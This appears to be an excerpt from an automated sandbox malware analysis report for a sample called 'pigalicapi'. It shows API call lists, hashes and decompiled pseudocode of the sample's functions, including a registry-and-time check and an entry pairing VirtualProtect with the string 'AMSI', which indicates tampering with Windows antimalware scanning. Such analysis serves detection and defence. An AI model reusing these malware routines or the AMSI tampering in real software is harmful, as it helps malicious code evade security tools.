                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Sleep$ErrorLastmemsetrealloc$Value
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2283913283-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a69817c4bdde9f950c5501da9f17fa0e5432666f91562d08bb2e98777d429283
                                                                                                                                                                                                                                                                                                        • Instruction ID: ae9a74b205b84ac027549f7f7f86efa9fe3e638cf07f69e35c76b9f64c0e4442
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a69817c4bdde9f950c5501da9f17fa0e5432666f91562d08bb2e98777d429283
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE31F4B4A042098FCB00EF69D484A9DBBF4FF88354F11456EE948DB311D738E981CB99
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                                                                                                                        			E0040CC00(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t18;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                                                                                                                        				_t12 =  *((intOrPtr*)( *_t18));
                                                                                                                                                                                                                                                                                                        				if(_t12 > 0xc0000091) {
                                                                                                                                                                                                                                                                                                        					if(_t12 == 0xc0000094) {
                                                                                                                                                                                                                                                                                                        						_t19 = 0;
                                                                                                                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						 *_t22 = 8;
                                                                                                                                                                                                                                                                                                        						L0040EEF0();
                                                                                                                                                                                                                                                                                                        						if(_t12 == 1) {
                                                                                                                                                                                                                                                                                                        							_v24 = 1;
                                                                                                                                                                                                                                                                                                        							 *_t22 = 8;
                                                                                                                                                                                                                                                                                                        							L0040EEF0();
                                                                                                                                                                                                                                                                                                        							if(_t19 != 0) {
                                                                                                                                                                                                                                                                                                        								E0040D3A0(_t12);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							L15:
                                                                                                                                                                                                                                                                                                        							_t13 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        							L16:
                                                                                                                                                                                                                                                                                                        							return _t13;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t12 == 0) {
                                                                                                                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                                                                                                                        							_t13 =  *0x422064; // 0x0
                                                                                                                                                                                                                                                                                                        							if(_t13 == 0) {
                                                                                                                                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_a4 = _t18;
                                                                                                                                                                                                                                                                                                        							_t22 =  &_v12;
                                                                                                                                                                                                                                                                                                        							_pop(_t18);
                                                                                                                                                                                                                                                                                                        							goto __eax;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t22 = 8;
                                                                                                                                                                                                                                                                                                        						 *_t12();
                                                                                                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_t12 == 0xc0000096) {
                                                                                                                                                                                                                                                                                                        						L19:
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						 *_t22 = 4;
                                                                                                                                                                                                                                                                                                        						L0040EEF0();
                                                                                                                                                                                                                                                                                                        						if(_t12 == 1) {
                                                                                                                                                                                                                                                                                                        							_v24 = 1;
                                                                                                                                                                                                                                                                                                        							 *_t22 = 4;
                                                                                                                                                                                                                                                                                                        							L0040EEF0();
                                                                                                                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t12 == 0) {
                                                                                                                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t22 = 4;
                                                                                                                                                                                                                                                                                                        						 *_t12();
                                                                                                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_t12 == 0xc0000093) {
                                                                                                                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                                                                                                                        						_t19 = 1;
                                                                                                                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t12 >= 0xc000008d) {
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t12 != 0xc0000005) {
                                                                                                                                                                                                                                                                                                        					if(_t12 != 0xc000001d) {
                                                                                                                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                                                                                                                                        				 *_t22 = 0xb;
                                                                                                                                                                                                                                                                                                        				L0040EEF0();
                                                                                                                                                                                                                                                                                                        				if(_t12 == 1) {
                                                                                                                                                                                                                                                                                                        					_v24 = 1;
                                                                                                                                                                                                                                                                                                        					 *_t22 = 0xb;
                                                                                                                                                                                                                                                                                                        					L0040EEF0();
                                                                                                                                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *_t22 = 0xb;
                                                                                                                                                                                                                                                                                                        				 *_t12();
                                                                                                                                                                                                                                                                                                        				goto L15;
                                                                                                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                                                                                                        0x0040cc08
                                                                                                                                                                                                                                                                                                        0x0040cc0d
                                                                                                                                                                                                                                                                                                        0x0040cc14
                                                                                                                                                                                                                                                                                                        0x0040cc5d
                                                                                                                                                                                                                                                                                                        0x0040cc81
                                                                                                                                                                                                                                                                                                        0x0040cc83
                                                                                                                                                                                                                                                                                                        0x0040cc83
                                                                                                                                                                                                                                                                                                        0x0040cc8b
                                                                                                                                                                                                                                                                                                        0x0040cc92
                                                                                                                                                                                                                                                                                                        0x0040cc9a
                                                                                                                                                                                                                                                                                                        0x0040cd26
                                                                                                                                                                                                                                                                                                        0x0040cd2e
                                                                                                                                                                                                                                                                                                        0x0040cd35
                                                                                                                                                                                                                                                                                                        0x0040cd3c
                                                                                                                                                                                                                                                                                                        0x0040cd42
                                                                                                                                                                                                                                                                                                        0x0040cd42
                                                                                                                                                                                                                                                                                                        0x0040ccad
                                                                                                                                                                                                                                                                                                        0x0040ccad
                                                                                                                                                                                                                                                                                                        0x0040ccb2
                                                                                                                                                                                                                                                                                                        0x0040ccb8
                                                                                                                                                                                                                                                                                                        0x0040ccb8
                                                                                                                                                                                                                                                                                                        0x0040cca2
                                                                                                                                                                                                                                                                                                        0x0040cc6d
                                                                                                                                                                                                                                                                                                        0x0040cc6d
                                                                                                                                                                                                                                                                                                        0x0040cc74
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cc76
                                                                                                                                                                                                                                                                                                        0x0040cc79
                                                                                                                                                                                                                                                                                                        0x0040cc7c
                                                                                                                                                                                                                                                                                                        0x0040cc7f
                                                                                                                                                                                                                                                                                                        0x0040cc7f
                                                                                                                                                                                                                                                                                                        0x0040cca4
                                                                                                                                                                                                                                                                                                        0x0040ccab
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040ccab
                                                                                                                                                                                                                                                                                                        0x0040cc64
                                                                                                                                                                                                                                                                                                        0x0040ccce
                                                                                                                                                                                                                                                                                                        0x0040ccce
                                                                                                                                                                                                                                                                                                        0x0040ccd6
                                                                                                                                                                                                                                                                                                        0x0040ccdd
                                                                                                                                                                                                                                                                                                        0x0040cce5
                                                                                                                                                                                                                                                                                                        0x0040cd10
                                                                                                                                                                                                                                                                                                        0x0040cd18
                                                                                                                                                                                                                                                                                                        0x0040cd1f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cd1f
                                                                                                                                                                                                                                                                                                        0x0040cce9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cceb
                                                                                                                                                                                                                                                                                                        0x0040ccf2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040ccf2
                                                                                                                                                                                                                                                                                                        0x0040cc6b
                                                                                                                                                                                                                                                                                                        0x0040ccc0
                                                                                                                                                                                                                                                                                                        0x0040ccc0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040ccc0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cc6b
                                                                                                                                                                                                                                                                                                        0x0040cc1b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cc26
                                                                                                                                                                                                                                                                                                        0x0040cccc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cccc
                                                                                                                                                                                                                                                                                                        0x0040cc2c
                                                                                                                                                                                                                                                                                                        0x0040cc34
                                                                                                                                                                                                                                                                                                        0x0040cc3b
                                                                                                                                                                                                                                                                                                        0x0040cc43
                                                                                                                                                                                                                                                                                                        0x0040ccf6
                                                                                                                                                                                                                                                                                                        0x0040ccfe
                                                                                                                                                                                                                                                                                                        0x0040cd05
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cd05
                                                                                                                                                                                                                                                                                                        0x0040cc4b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040cc4d
                                                                                                                                                                                                                                                                                                        0x0040cc54
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: signal
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1946981877-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d14f430031e0000c1544ae875ed3aa060c0f773e8259265079f7acada95bda59
                                                                                                                                                                                                                                                                                                        • Instruction ID: d8b5130f18038d3c219e8aaee35d86da13098021128de2a3e6af161d937793ff
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d14f430031e0000c1544ae875ed3aa060c0f773e8259265079f7acada95bda59
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69217E7110C200CAF7206F65C5C436FB6A0AB45758F114E2BD989E73C1C77D8884979B
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7,?,?,?,?,0041586E), ref: 004165AE
                                                                                                                                                                                                                                                                                                        • InterlockedDecrement.KERNEL32 ref: 004165B9
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 004165D3
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 00416607
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 00416616
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$DecrementInterlocked
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1781445796-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: cf38177f454b4d407fb6abba26056f132e72fe4696bd102978adcf22e3062811
                                                                                                                                                                                                                                                                                                        • Instruction ID: f1d07c7601fc08a455496ddd5bfcc69915974a3964eaa512498397c80aedb5d4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf38177f454b4d407fb6abba26056f132e72fe4696bd102978adcf22e3062811
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2621C7B5A042089FCB00EFB9E58849DBBF0EB48360F01852AEC98D7310E734E955CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandleValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 492146193-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 50172de1c8ccb0a201679019f7e5b868fe7c56b5f502739187e9b9fc105b9909
                                                                                                                                                                                                                                                                                                        • Instruction ID: 807a0fc4849867346c23f955af7b1b9f8301ac30692e4abd2189dee9186e86bd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 50172de1c8ccb0a201679019f7e5b868fe7c56b5f502739187e9b9fc105b9909
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F512BB0A04305CFDB10EFA5D58879A7BF4AF04344F01856AD8458B355E7B8E9C5CF9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(10004070,00000000), ref: 10002509
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,10004078), ref: 10002525
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 10002560
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 10002581
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                        • String ID: AMSI
                                                                                                                                                                                                                                                                                                        • API String ID: 3300690313-3828877684
                                                                                                                                                                                                                                                                                                        • Opcode ID: aedc0c72c88739d98e6cc95382061a03d6f4a4626be1828d24e7b39d8783c48f
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7beab1cd16fb010797eaf1f52ccd341b116c57276f54c1637b54f9798f26af1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aedc0c72c88739d98e6cc95382061a03d6f4a4626be1828d24e7b39d8783c48f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C11DAB5D05209EFEB04CF94CC98BAEBBB4FB48345F108599EA11A7344D770AA40DB55
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E024E9290() {
                                                                                                                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                                                        				if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}





                                                                                                                                                                                                                                                                                                        0x024e9296
                                                                                                                                                                                                                                                                                                        0x024e92b4
                                                                                                                                                                                                                                                                                                        0x024e92bb
                                                                                                                                                                                                                                                                                                        0x024e92c8
                                                                                                                                                                                                                                                                                                        0x024e92c8
                                                                                                                                                                                                                                                                                                        0x024e92d1

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 024E92A7
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 024E92AE
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000), ref: 024E92C1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4e48800aaafd6dad51158b852f50abf2c7e1bf5449d8772a738782002c557a2d
                                                                                                                                                                                                                                                                                                        • Instruction ID: e98d93c4e9618d9ec930035a6c8a94b48986a2a0db25d3e97e7e348fcaaecdcf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e48800aaafd6dad51158b852f50abf2c7e1bf5449d8772a738782002c557a2d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4E01A75C40308EBEF04EBF0D98DB8DBB78AB08207F604996E912A6241D7745654CB51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                                                                                                                        			E024E7250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				int _v44;
                                                                                                                                                                                                                                                                                                        				int _v48;
                                                                                                                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                                                                                                                        				signed int _v68;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v72;
                                                                                                                                                                                                                                                                                                        				struct _SYSTEMTIME _v88;
                                                                                                                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t68;
                                                                                                                                                                                                                                                                                                        				short* _t69;
                                                                                                                                                                                                                                                                                                        				signed int _t70;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t101;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 1;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 ||  *((intOrPtr*)(_a4 + 0x10)) == 0) {
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v24 = E024E16F0(_a8, _a12);
                                                                                                                                                                                                                                                                                                        					_t58 =  *0x24f18a0; // 0x24f3b88
                                                                                                                                                                                                                                                                                                        					_v12 = _t58;
                                                                                                                                                                                                                                                                                                        					E024E7D20(_t58,  &_v40, 0, 0x10);
                                                                                                                                                                                                                                                                                                        					wsprintfA( &_v40, "%u", _v24);
                                                                                                                                                                                                                                                                                                        					_t100 = _t97 + 0x20;
                                                                                                                                                                                                                                                                                                        					_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                                        					if(( *0x24f435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                                                                                                                                                        					if(RegOpenKeyExA(_v16, _v12, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                                                        						_v48 = 0x10;
                                                                                                                                                                                                                                                                                                        						_v44 = 0x10;
                                                                                                                                                                                                                                                                                                        						if(RegQueryValueExA(_v20,  &_v40, 0, 0,  &_v64,  &_v44) == 0 && _v44 == 0x10) {
                                                                                                                                                                                                                                                                                                        							_v72 =  &_v64;
                                                                                                                                                                                                                                                                                                        							GetLocalTime( &_v88);
                                                                                                                                                                                                                                                                                                        							_t91 = _v72;
                                                                                                                                                                                                                                                                                                        							_t101 = _t100 - 0x10;
                                                                                                                                                                                                                                                                                                        							_t68 = _t101;
                                                                                                                                                                                                                                                                                                        							 *_t68 =  *_t91;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t91 + 4));
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t68 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
                                                                                                                                                                                                                                                                                                        							_t69 = _t101 - 0x10;
                                                                                                                                                                                                                                                                                                        							 *_t69 = _v88.wYear;
                                                                                                                                                                                                                                                                                                        							_t69[2] = _v88.wDayOfWeek;
                                                                                                                                                                                                                                                                                                        							_t69[4] = _v88.wHour;
                                                                                                                                                                                                                                                                                                        							_t69[6] = _v88.wSecond;
                                                                                                                                                                                                                                                                                                        							_t70 = E024E9910();
                                                                                                                                                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                                                                                                                                                        							_v68 = _t70 / 0x3c;
                                                                                                                                                                                                                                                                                                        							if(_v68 <  *((intOrPtr*)(_a4 + 0x10))) {
                                                                                                                                                                                                                                                                                                        								_v5 = 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						RegCloseKey(_v20);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}























                                                                                                                                                                                                                                                                                                        0x024e7256
                                                                                                                                                                                                                                                                                                        0x024e725e
                                                                                                                                                                                                                                                                                                        0x024e73af
                                                                                                                                                                                                                                                                                                        0x024e73b5
                                                                                                                                                                                                                                                                                                        0x024e7285
                                                                                                                                                                                                                                                                                                        0x024e7295
                                                                                                                                                                                                                                                                                                        0x024e7298
                                                                                                                                                                                                                                                                                                        0x024e729d
                                                                                                                                                                                                                                                                                                        0x024e72a8
                                                                                                                                                                                                                                                                                                        0x024e72bd
                                                                                                                                                                                                                                                                                                        0x024e72c3
